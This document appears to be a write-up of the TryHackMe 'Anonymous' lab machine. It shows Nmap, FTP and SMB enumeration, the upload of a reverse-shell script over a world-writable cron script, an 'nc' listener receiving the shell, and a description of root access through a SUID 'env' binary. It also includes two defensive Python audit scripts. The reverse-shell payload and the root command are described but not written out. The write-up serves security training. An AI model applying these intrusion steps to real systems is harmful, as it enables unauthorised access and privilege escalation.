Anonymous Writeup (TryHackMe Medium Machine)
Overview
Anonymous is a medium Linux machine from TryHackMe. This box tests your knowledge regarding Linux fundamentals and basic privilege escalation techniques.
We start by enumerating the FTP and Samba SMB services. We discover a script on the FTP server that is run periodically. Because we also have write access to it, we overwrite this script and get a shell.
Once inside, we discover an unusual SUID “env” binary. We abuse this with a simple command and get a root shell. Easy!
Nmap scan
We start with an Nmap scan.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -A 10.10.129.192 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-29 12:16 EDT
Nmap scan report for 10.10.129.192
Host is up (0.050s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.2.141
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable]
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_ 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -4h09m05s, deviation: 0s, median: -4h09m06s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-04-29T12:07:17
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: anonymous
| NetBIOS computer name: ANONYMOUS\x00
| Domain name: \x00
| FQDN: anonymous
|_ System time: 2025-04-29T12:07:17+00:00
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE (using port 995/tcp)
HOP RTT ADDRESS
1 50.98 ms 10.9.0.1
2 51.31 ms 10.10.129.192
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.35 seconds
The Nmap scan showed 4 open ports: port 21 for FTP, port 22 for SSH, and ports 139 and 445 for Samba SMB. We also get the versions of the active services, the computer name “anonymous” and a directory “scripts” on FTP.
FTP & SMB enumeration
Whenever we discover services like FTP and SMB running on a machine, we always want to enumerate them. Maybe there are interesting files on FTP or accessible shares on SMB.
Starting with FTP, we can see in the Nmap scan that anonymous login is allowed. That means we can log in as user “anonymous” without a password and see what is present on the FTP server.
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.129.192
Connected to 10.10.129.192.
220 NamelessOne's FTP Server!
Name (10.10.129.192:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||43208|)
150 Here comes the directory listing.
drwxr-xr-x 3 65534 65534 4096 May 13 2020 .
drwxr-xr-x 3 65534 65534 4096 May 13 2020 ..
drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||60495|)
150 Here comes the directory listing.
drwxrwxrwx 2 111 113 4096 Jun 04 2020 .
drwxr-xr-x 3 65534 65534 4096 May 13 2020 ..
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 1075 Apr 29 12:10 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
226 Directory send OK.
We can notice a couple of things here. First, there are some files in the “scripts” directory that we can download with the “get” command for inspection. Second, there’s a potential username, “NamelessOne”, mentioned in the FTP banner.
Next, I moved to SMB. There is a share called “pics” with 2 pictures of corgis (cute af). I inspected both images with “strings”. Neither of them contained useful information, just Photoshop metadata.
┌──(kali㉿kali)-[~]
└─$ smbclient -L 10.10.129.192
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
pics Disk My SMB Share Directory for Pics
IPC$ IPC IPC Service (anonymous server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP ANONYMOUS
┌──(kali㉿kali)-[~]
└─$ smbclient \\\\10.10.129.192\\pics
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun May 17 07:11:34 2020
.. D 0 Wed May 13 21:59:10 2020
corgo2.jpg N 42663 Mon May 11 20:43:42 2020
puppos.jpeg N 265188 Mon May 11 20:43:42 2020
20508240 blocks of size 1024. 13306800 blocks available
It’s also good practice to run “enum4linux” (or the newer Python version, “enum4linux-ng”) whenever there’s a Samba SMB service on the machine. This gives us a lot of information about the system and also confirms that there’s an active user “namelessone”.
┌──(kali㉿kali)-[~]
└─$ enum4linux -a 10.10.129.192
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Apr 29 12:38:40 2025
=========================================( Target Information )=========================================
Target ........... 10.10.129.192
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 10.10.129.192 )===========================
[LOTS OF INFORMATION]
[Screenshot: Enum4Linux found user “namelessone” with RID cycling]
Uploading reverse shell to FTP & getting user flag
I went back to the files from the FTP server. There was a “clean.sh” Bash script, which basically takes a list of files and deletes them from the “/tmp” directory.

There was a “removed_files.log” file too, which recorded every deleted file. Since there were multiple lines of output, I assumed that “clean.sh” was run periodically on the machine.

If we look carefully at the FTP listing once again, we might notice that we have write permission over the “/scripts” directory. That means we can overwrite the “clean.sh” script with our own code.
[Screenshot: we have write permission over the “/scripts” directory on the FTP server]
So I created my own “clean.sh” with a Bash reverse shell.

And simply uploaded it to the FTP server with the “put” command.
ftp> ls
229 Entering Extended Passive Mode (|||25149|)
150 Here comes the directory listing.
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 1075 Apr 29 15:20 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
226 Directory send OK.
ftp> put clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||18316|)
150 Ok to send data.
100% |******************************************************************************************************************************************************************************************************************| 53 1.36 MiB/s 00:00 ETA226 Transfer complete.
53 bytes sent in 00:00 (0.26 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||10861|)
150 Here comes the directory listing.
-rwxr-xrwx 1 1000 1000 53 Apr 29 15:21 clean.sh
-rw-rw-r-- 1 1000 1000 1118 Apr 29 15:21 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
226 Directory send OK.
I waited for a minute or so and got the reverse shell as user “namelessone”.
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.9.2.141] from (UNKNOWN) [10.10.167.103] 59714
bash: cannot set terminal process group (1413): Inappropriate ioctl for device
bash: no job control in this shell
namelessone@anonymous:~$ whoami
whoami
namelessone
namelessone@anonymous:~$
User flag is waiting in NamelessOne’s home directory.
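The weakness this section relies on is visible in the FTP listing: a script that runs on a schedule is writable by “other” (-rwxr-xrwx) and sits in a world-writable directory (drwxrwxrwx). The following host-side check for that condition is an added example, not part of the original writeup; the function names, the crontab text and the temporary paths are constructed for illustration.

```python
import os
import stat
import tempfile

def cron_command_paths(crontab_text):
    """Absolute paths named in the command part of user-crontab lines."""
    paths = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # "@reboot cmd" has one schedule field; "m h dom mon dow cmd" has five.
        n = 1 if line.startswith("@") else 5
        parts = line.split(None, n)
        if len(parts) <= n:
            continue  # environment assignment or malformed line
        # Redirect targets are kept too: a log in a writable directory matters.
        paths += [tok for tok in parts[-1].split() if tok.startswith("/")]
    return paths

def audit_path(path, root="/"):
    """List (path, mode) for every other-writable component from path up to root."""
    findings = []
    current, root = os.path.realpath(path), os.path.realpath(root)
    while True:
        mode = os.stat(current).st_mode
        sticky_dir = stat.S_ISDIR(mode) and mode & stat.S_ISVTX
        # Sticky directories (/tmp) stop users replacing files they do not own.
        if mode & stat.S_IWOTH and not sticky_dir:
            findings.append((current, stat.filemode(mode)))
        if current == root or current == os.path.dirname(current):
            return findings
        current = os.path.dirname(current)

if __name__ == "__main__":
    # Constructed tree reproducing the modes shown in the FTP listing above.
    base = tempfile.mkdtemp()
    scripts = os.path.join(base, "scripts")
    os.mkdir(scripts)
    os.chmod(scripts, 0o777)
    clean = os.path.join(scripts, "clean.sh")
    with open(clean, "w") as fh:
        fh.write("#!/bin/bash\n")
    os.chmod(clean, 0o757)
    crontab = f"SHELL=/bin/bash\n* * * * * {clean}\n"  # constructed crontab
    for target in cron_command_paths(crontab):
        for hit in audit_path(target, root=base):
            print("other-writable:", *hit)
```

Any finding means a user other than the owner can change what the scheduled job executes, either by editing the file or by replacing it inside its directory.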
Abusing “env” SUID & getting root flag
It’s always good to remember your usual checklist of privilege escalation techniques and go down that list. Although we don’t have the password for our user (which narrows our possibilities), we can still check a lot of things like cronjobs, environment variables, SUID binaries and so on.
In fact, abusing a SUID binary (a binary that runs with the permissions of its owner) turned out to be the correct way to root this box. There was an unusual “env” binary with the SUID bit set.

A good resource for checking privilege escalation techniques against these binaries is GTFOBins. When we look up the “env” binary, we find out that we can invoke a root shell by abusing the SUID bit.

One simple command does it all.

The root flag patiently waits in the root’s directory.
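For hardening, the same finding can be caught before an attacker sees it. The audit below is an added example, not part of the original writeup: it walks a directory tree, reports setuid/setgid files, and marks as critical any whose name is on a watchlist of programs that run a command chosen by the caller. Both the watchlist and the allowlist of expected setuid paths are assumptions to adapt per distribution.

```python
import os
import stat

# Assumed watchlist: programs that execute a command or script chosen by the
# caller, so a setuid copy lends the owner's privileges to any local user.
COMMAND_RUNNERS = {"env", "bash", "sh", "dash", "python3", "perl", "find",
                   "nice", "timeout"}
# Assumed allowlist (full paths) of setuid programs expected on the host.
EXPECTED_SETUID = {"/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd",
                   "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/chsh",
                   "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/gpasswd"}

def classify(path, mode, expected=EXPECTED_SETUID):
    """Return 'critical', 'review' or None for one file's path and st_mode."""
    if not stat.S_ISREG(mode) or not mode & (stat.S_ISUID | stat.S_ISGID):
        return None
    if os.path.basename(path) in COMMAND_RUNNERS:
        return "critical"  # never expected, even if someone allowlisted it
    return None if path in expected else "review"

def scan(root):
    """Walk root (symlinks are not followed) and return sorted findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable entry
            level = classify(path, st.st_mode)
            if level:
                findings.append((level, path, stat.filemode(st.st_mode), st.st_uid))
    return sorted(findings)

if __name__ == "__main__":
    for level, path, mode, uid in scan("/usr"):
        print(f"{level:8} {mode} uid={uid} {path}")
```

A “critical” hit should have its setuid bit removed; “review” entries are compared against the package manager's record of the file before deciding.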
Summary
Anonymous is a medium machine from TryHackMe. This box is perfect for beginners starting in cybersecurity. It presents itself as a test for hackers, testing their knowledge from Linux fundamentals to basic privilege escalation techniques. Anonymous depends heavily on good service enumeration (FTP and SMB). After tricking the system into executing our malicious Bash script, we get a shell on the machine. After that, we manage to get the root shell by abusing the “env” binary with the SUID bit set. Personally, I had fun doing this box. Definitely not a medium machine, if you ask me. My favourite part is the first one, when we had to overwrite a cronjob to get the initial foothold. I recommend it to anyone who’s ready to practice the most basic and fundamental skills. Don’t let the medium difficulty scare you, it’s really not that bad.